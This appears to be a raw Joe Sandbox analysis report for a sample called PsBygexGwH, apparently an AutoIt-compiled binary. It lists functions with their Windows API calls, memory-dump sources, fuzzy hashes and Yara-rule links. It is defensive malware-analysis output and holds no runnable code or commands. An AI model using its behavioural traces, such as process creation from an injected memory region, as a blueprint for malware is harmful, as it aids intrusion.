Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: d99374fc63f9b799002c1e53bf25229e1688ea8444c11e82eab23b68aa2a60ab
Instruction ID: 599e0fe3561a2b211ed1f7002c2a6b59dc52f949c46ba9c67c9c95642166a1b5
Opcode Fuzzy Hash: d99374fc63f9b799002c1e53bf25229e1688ea8444c11e82eab23b68aa2a60ab
Instruction Fuzzy Hash: 81F0C23490060D77CB05BAA6EC4AC9E7B6C9F64310B604535BA28A65F1EF71DA26C980

Uniqueness

Uniqueness Score: -1.00%

Function 023C1060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 023C10A5
ExitProcess.KERNEL32(00000000), ref: 023C10C4

Strings

D, xrefs: 023C1071

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 0aafd38257db3961b4310f0e794442a93b83cea40b82929cdc0aba5a9ff13e5d
Instruction ID: 09bbffef91c17ee4f832d86d682f40c35590be1cd213092fcaaf7130c8aebbe0
Opcode Fuzzy Hash: 0aafd38257db3961b4310f0e794442a93b83cea40b82929cdc0aba5a9ff13e5d
Instruction Fuzzy Hash: 90F0ECB594024CABDB60DFE0CD49FEE777DBF04701F108518BA4A9A181DF749A088B61

Uniqueness

Uniqueness Score: -1.00%

Function 00193017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0019302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00193044

Strings

aut, xrefs: 00193038

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: bd928c0d6546c397ebec909374e41e62f501611de3780469d6c221d1ea341562
Instruction ID: 990c107c187f88f62fd939b90a483238f1f9a3924f6ca386ef78a9c302e605ee
Opcode Fuzzy Hash: bd928c0d6546c397ebec909374e41e62f501611de3780469d6c221d1ea341562
Instruction Fuzzy Hash: 75D05E7290032867DA20A7A5AC0EFCBBA7CDB04750F4002A1B755E2091DBB09984CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 001A7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001A82F5
TerminateProcess.KERNEL32(00000000), ref: 001A82FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 001A84DD

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 2a753516a0f396322b9646132aef524c98dca0fdc4a238f86c6f7d2fd2b4fd5b
Instruction ID: 8506edeeb9aa4486adf3b580475948cdb2152e1dfbb6b42f4ba80cd9cebcbb6e
Opcode Fuzzy Hash: 2a753516a0f396322b9646132aef524c98dca0fdc4a238f86c6f7d2fd2b4fd5b
Instruction Fuzzy Hash: 82126A75A083019FC714DF28C484B6ABBE5BF99318F04895DF8998B292DB31ED45CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00155AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd238382df86311fc6866d5b424968d974793ab02460c8fd923811cbe1bb76a3
Instruction ID: b8cc779fb84ea3ee1eb3f9f30f771fb33ada1b5d5776c96dda079acf867e9300
Opcode Fuzzy Hash: dd238382df86311fc6866d5b424968d974793ab02460c8fd923811cbe1bb76a3
Instruction Fuzzy Hash: 3351F271D00609DFCF159FA8C859FAE7BBAAF15312F140059FC21AF2A1D7719A0ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 001210F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00121BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00121BF4
Part of subcall function 00121BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00121BFC
Part of subcall function 00121BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00121C07
Part of subcall function 00121BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00121C12
Part of subcall function 00121BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00121C1A
Part of subcall function 00121BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00121C22

Part of subcall function 00121B4A: RegisterWindowMessageW.USER32(00000004,?,001212C4), ref: 00121BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0012136A
OleInitialize.OLE32 ref: 00121388
CloseHandle.KERNEL32(00000000,00000000), ref: 001624AB

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: c4a1fc2f56359517c2e0a3dea5e0fef775b10803fc2d5b0779fc84a4ab5dcaad
Instruction ID: c6c213cbe265e587cb3b38358948cab2dded59e764341593adee436046cf8148
Opcode Fuzzy Hash: c4a1fc2f56359517c2e0a3dea5e0fef775b10803fc2d5b0779fc84a4ab5dcaad
Instruction Fuzzy Hash: 3F71CDB4901304FFC784EF7ABE456B53AE1FBAA394754822AD10AD7A71EB314485CF40

Uniqueness

Uniqueness Score: -1.00%

Function 001254C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0012556D
SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0012557D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c81671942bef38bce922fdece6facd3aa07a403df57e772a5c3da66586c31c23
Instruction ID: e42d1b9050da7407f68ab8f39bc66775c3b1172ea2c59b4415d35f4508d9ad4f
Opcode Fuzzy Hash: c81671942bef38bce922fdece6facd3aa07a403df57e772a5c3da66586c31c23
Instruction Fuzzy Hash: A8314C71A00A19FFDB18CF28D880B99B7B6FB48314F158629E91997240D771FEA4CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 001586AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,001585CC,?,001E8CC8,0000000C), ref: 00158704
GetLastError.KERNEL32(?,001585CC,?,001E8CC8,0000000C), ref: 0015870E
__dosmaperr.LIBCMT ref: 00158739

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 472b40cc5e5ff53d2ce3ca168864619f37d0090b9a3b241746a5fd55a1079524
Instruction ID: a777ba682a8f85707ddcf601a859e74aee1c448100535a8e458aa63f471c39d5
Opcode Fuzzy Hash: 472b40cc5e5ff53d2ce3ca168864619f37d0090b9a3b241746a5fd55a1079524
Instruction Fuzzy Hash: 64010832A056209BD7A56234E845B7E674A5B95776F290219FC38AF1E2DFA08C898190

Uniqueness

Uniqueness Score: -1.00%

Function 00192FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00192CD4,?,?,?,00000004,00000001), ref: 00192FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00192CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00193006
CloseHandle.KERNEL32(00000000,?,00192CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0019300D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: c23c9d80996bc281fc8faac00f1e43ec4835afa43b28aa6df0141f56a496e15f
Instruction ID: 2162baac2432c796b90491525e348195787862f877fbd780a89a48444c0dfada
Opcode Fuzzy Hash: c23c9d80996bc281fc8faac00f1e43ec4835afa43b28aa6df0141f56a496e15f
Instruction Fuzzy Hash: 8CE0863228021077D6302759BC0DF8B3A5CE786B71F104320F769760D047A0154142E8

Uniqueness

Uniqueness Score: -1.00%

Function 00131310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001317F6

Strings

CALL, xrefs: 001317C6

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: c9f217a0e1a3edf56af9ad8b225c61e6d6a9949208d1cf5e1efc2c07184b5e0c
Instruction ID: 420476aaf5820d973e75bf53e4716d08efd4944f5d9170e80c04029d95810dc6
Opcode Fuzzy Hash: c9f217a0e1a3edf56af9ad8b225c61e6d6a9949208d1cf5e1efc2c07184b5e0c
Instruction Fuzzy Hash: 1A228CB0608201EFC718CF14C484B2ABBF1BF99314F19896DF49A8B361D771E955CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00196EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00196F6B

Part of subcall function 00124ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00196F5A, 00196F63

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: a64d04e776506ac6fab49efd356288e0f94466ca891e4f79903130ae1da6d870
Instruction ID: 7dcd037e6cf6a530f46ac345216d74ac854492f3456955f67b1dbf7a54d7cecf
Opcode Fuzzy Hash: a64d04e776506ac6fab49efd356288e0f94466ca891e4f79903130ae1da6d870
Instruction Fuzzy Hash: 40B1A1311183118FCB14EF24E89196EB7E5BFA4304F44896DF496972A2EB30ED59CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00122DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00162C8C

Part of subcall function 00123AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00123A97,?,?,00122E7F,?,?,?,00000000), ref: 00123AC2

Part of subcall function 00122DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00122DC4

Strings

X, xrefs: 00162C5A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: d15cd7f1b4ef741007bdd37fb96595869904a03e4276378b65469c6bdc330f12
Instruction ID: 71d727bc740a68a31abf388d72cee53de92a0847cfe906a690affafeade1fa25
Opcode Fuzzy Hash: d15cd7f1b4ef741007bdd37fb96595869904a03e4276378b65469c6bdc330f12
Instruction Fuzzy Hash: FC21A871A00298AFCB01EF94DC45BEE7BF8AF59314F004059E405F7241DBB85A998FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00192557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00192587

Strings

EA06, xrefs: 001925B9

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: f88b77998c0426d60b659630401eddea357ea4658aef434b7b4c301b028908eb
Instruction ID: 8fb858dc5848bdbef621b9fecdd0e51a27f02497694aeb22c79c2fc7b67dac73
Opcode Fuzzy Hash: f88b77998c0426d60b659630401eddea357ea4658aef434b7b4c301b028908eb
Instruction Fuzzy Hash: 4301B5729042587EEF18C7A8C856EEEBBF89B15305F00455EE152D21C1E6B4E6188B60

Uniqueness

Uniqueness Score: -1.00%

Function 00123837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00123908

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 49eb691b9deae74b6a3dfa29a73daf87a3ebb08d9b862085b41491e650defe37
Instruction ID: c84aa1d847314f5b594c44cec77ff2a734c633fd12168ce927f27de8c5f0aece
Opcode Fuzzy Hash: 49eb691b9deae74b6a3dfa29a73daf87a3ebb08d9b862085b41491e650defe37
Instruction Fuzzy Hash: A131B6B0604311DFD720DF24E8847A7BBF4FB49718F00092EF5A987650E775AA94CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00125745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0012949C,?,00008000), ref: 00125773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0012949C,?,00008000), ref: 00164052

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 00fdda0a667276eb8bfcbaa4972c4ead8235ff1a0255a9cf5800fa044a52e26e
Instruction ID: 60e82cdf7003aa9daaffaef6ff7c16bacbbb7ac661ec6f03ef1e6a5133230943
Opcode Fuzzy Hash: 00fdda0a667276eb8bfcbaa4972c4ead8235ff1a0255a9cf5800fa044a52e26e
Instruction Fuzzy Hash: 92014031185235B6E3355A2ADC4EF977F99EF067B0F158310BA9C6A1E0C7B45864CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0012B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0012BB4E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: c7485086319cdb4b898f7ca36e5f751d70d6360a94b44da48b6678d5ce7d4aff
Instruction ID: 1de57d44325500492db88c4ce0dc559958ba11b37eb7abfb55b225a8e842f7d0
Opcode Fuzzy Hash: c7485086319cdb4b898f7ca36e5f751d70d6360a94b44da48b6678d5ce7d4aff
Instruction Fuzzy Hash: 1132FDB5A08229DFCF24CF14D894ABEB7B5FF48304F158059E909AB2A1C774ED91CB91

Uniqueness

Uniqueness Score: -1.00%

Function 023C10D0 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

APIs

Part of subcall function 023C08E0: GetFileAttributesW.KERNELBASE(?), ref: 023C08EB

CreateDirectoryW.KERNELBASE(?,00000000), ref: 023C11FF

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: c1fc141f4cd2bd7326890f44ee376bd40f166218598b0344cf600e312907e652
Instruction ID: d3834f5119031a41c2c9e09d8fd8671440007a197b6629eba6f52f7d9bd45e2f
Opcode Fuzzy Hash: c1fc141f4cd2bd7326890f44ee376bd40f166218598b0344cf600e312907e652
Instruction Fuzzy Hash: 2C518735A1020D96DF24EFB0C954BEF737AEF58300F1045A9A60DE7184EB759B44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00124ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00124E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00124EDD,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E9C
Part of subcall function 00124E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00124EAE
Part of subcall function 00124E90: FreeLibrary.KERNEL32(00000000,?,?,00124EDD,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124EFD

Part of subcall function 00124E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00163CDE,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E62
Part of subcall function 00124E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00124E74
Part of subcall function 00124E59: FreeLibrary.KERNEL32(00000000,?,?,00163CDE,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E87

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: bd2d990e3f9011b3b2527b8cb8c90592bbe2bde81d3806965f57bbe62b4b9684
Instruction ID: 229dfb0afe6efd1a3b48557f1a1d4097bea06424725af2dc457b70efbca43f2f
Opcode Fuzzy Hash: bd2d990e3f9011b3b2527b8cb8c90592bbe2bde81d3806965f57bbe62b4b9684
Instruction Fuzzy Hash: 43113A31600225ABDF14FF64FD02FAD77A5AFA0710F10842EF542A61C1EF749E249B90

Uniqueness

Uniqueness Score: -1.00%

Function 00158402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00158440

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

